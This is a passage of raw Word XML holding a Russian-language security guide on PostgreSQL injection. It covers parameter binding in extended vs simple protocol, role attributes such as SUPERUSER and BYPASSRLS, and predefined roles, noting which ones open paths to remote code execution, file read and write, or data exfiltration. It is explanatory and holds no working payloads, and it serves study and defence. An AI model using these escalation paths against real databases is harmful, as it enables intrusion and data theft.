        <w:t xml:space="preserve">, но никакой защиты от инъекций не даёт. И наоборот, тот же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM t WHERE id = $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, отправленный через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, защищает от любых стандартных payload-ов в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — потому что значение никогда не доходит до парсера как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDD128" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Во-вторых, граница уязвимости проходит не по СУБД и не по приложению, а по режиму конкретного драйвера в конкретном вызове. Один и тот же psycopg может в одной строке кода работать в extended-режиме, а в соседней — в simple. Детали по драйверам — в категории 3.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADA47A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В-третьих, всё, что не является значением, — имена таблиц, имена колонок, выражения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметрами быть не может. Для этих контекстов extended-протокол не помогает, и они закрываются другими механизмами (см. 3.14, 3.16, раздел 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8BB7F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Роли, привилегии, предопределённые роли</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D1177" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Модель прав в PostgreSQL имеет три слоя, и инъекционные цепочки эскалации работают именно за счёт прыжков между этими слоями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33C570" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Базовые привилегии на объекты.</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INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TRUNCATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TRIGGER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выдаются явно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на функции и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USAGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схемы, языки и расширения — то же. Это обычный SQL-стандарт и сам по себе вектор атаки даёт редко.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A5746" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Атрибуты роли.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Флаги, не привязанные к конкретному объекту: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATEDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATEROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOGIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REPLICATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Самый опасный, очевидно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обладатель обходит вообще все проверки. На managed-платформах (RDS, Cloud SQL, Supabase) клиентский «admin» по умолчанию не имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t>, и многие пост-эксплуатационные техники против self-hosted кластеров на managed ломаются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362B606" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отключает Row-Level Security для роли. Важный нюанс: эта привилегия неявно действует и без явного флага — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходит RLS всегда, а owner таблицы обходит RLS на собственной таблице по умолчанию (исключение — если на таблице установлен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t>). Это означает, что RLS обходим ещё до любых CVE: достаточно, чтобы запрос выполнялся под суперюзером или под владельцем таблицы. Контекст для 3.17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEDFAB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Предопределённые роли.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL поставляется с набором ролей, в которые можно добавить пользователя через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT role_name TO user</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы выдать целевую группу привилегий, не делая его суперюзером. Появлялись постепенно, и каждая открывает свою поверхность атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B83458" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — разрешает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>. Член этой роли получает RCE одним SQL-запросом (см. 3.7.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCE317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — разрешают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... FROM '/path'</w:t>
      </w:r>
      <w:r>
        <w:t>. Канал чтения и записи произвольных файлов (см. 3.6.3, 3.6.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60E25D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — снимают необходимость в индивидуальных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT/INSERT/UPDATE/DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на все таблицы. Удобство </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>для аналитиков, крупный канал утечки данных при компрометации application-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D8F11D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_database_owner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 14</w:t>
      </w:r>
      <w:r>
        <w:t>) — неявная роль, членом которой автоматически является owner текущей БД. Используется в template-сценариях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6AB85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_create_subscription</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SUBSCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для логической репликации. При злоупотреблении даёт канал эксфильтрации через выгрузку в чужой кластер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070ED9D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_use_reserved_connections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — резервные коннекты, выделенные через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reserved_connections</w:t>
      </w:r>
      <w:r>
        <w:t>. Не вектор атаки сам по себе, но фактор в DoS-моделях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC71239" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — даёт привилегию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, позволяющую запускать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VACUUM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REINDEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CLUSTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFRESH MATERIALIZED VIEW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOCK TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>. Открывает новую поверхность для атак через index expressions (концептуальный наследник CVE-2022-1552, см. 3.13.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312F2BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии PUBLIC.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В PostgreSQL существует виртуальная «роль» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, членом которой неявно является каждый пользователь. По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONNECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на любую базу (если не отозван) и — до PG 15 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на схему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это означает, что без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REVOKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> минимально аутентифицированный пользователь может создавать объекты в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>. Историческая причина множества цепочек эскалации (см. 2.4 и 3.13.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F73B4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Дефолты для application-роли.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Стандартная роль для application-сервера (то, что вы создаёте через </w:t>
      </w:r>
      <w:r>
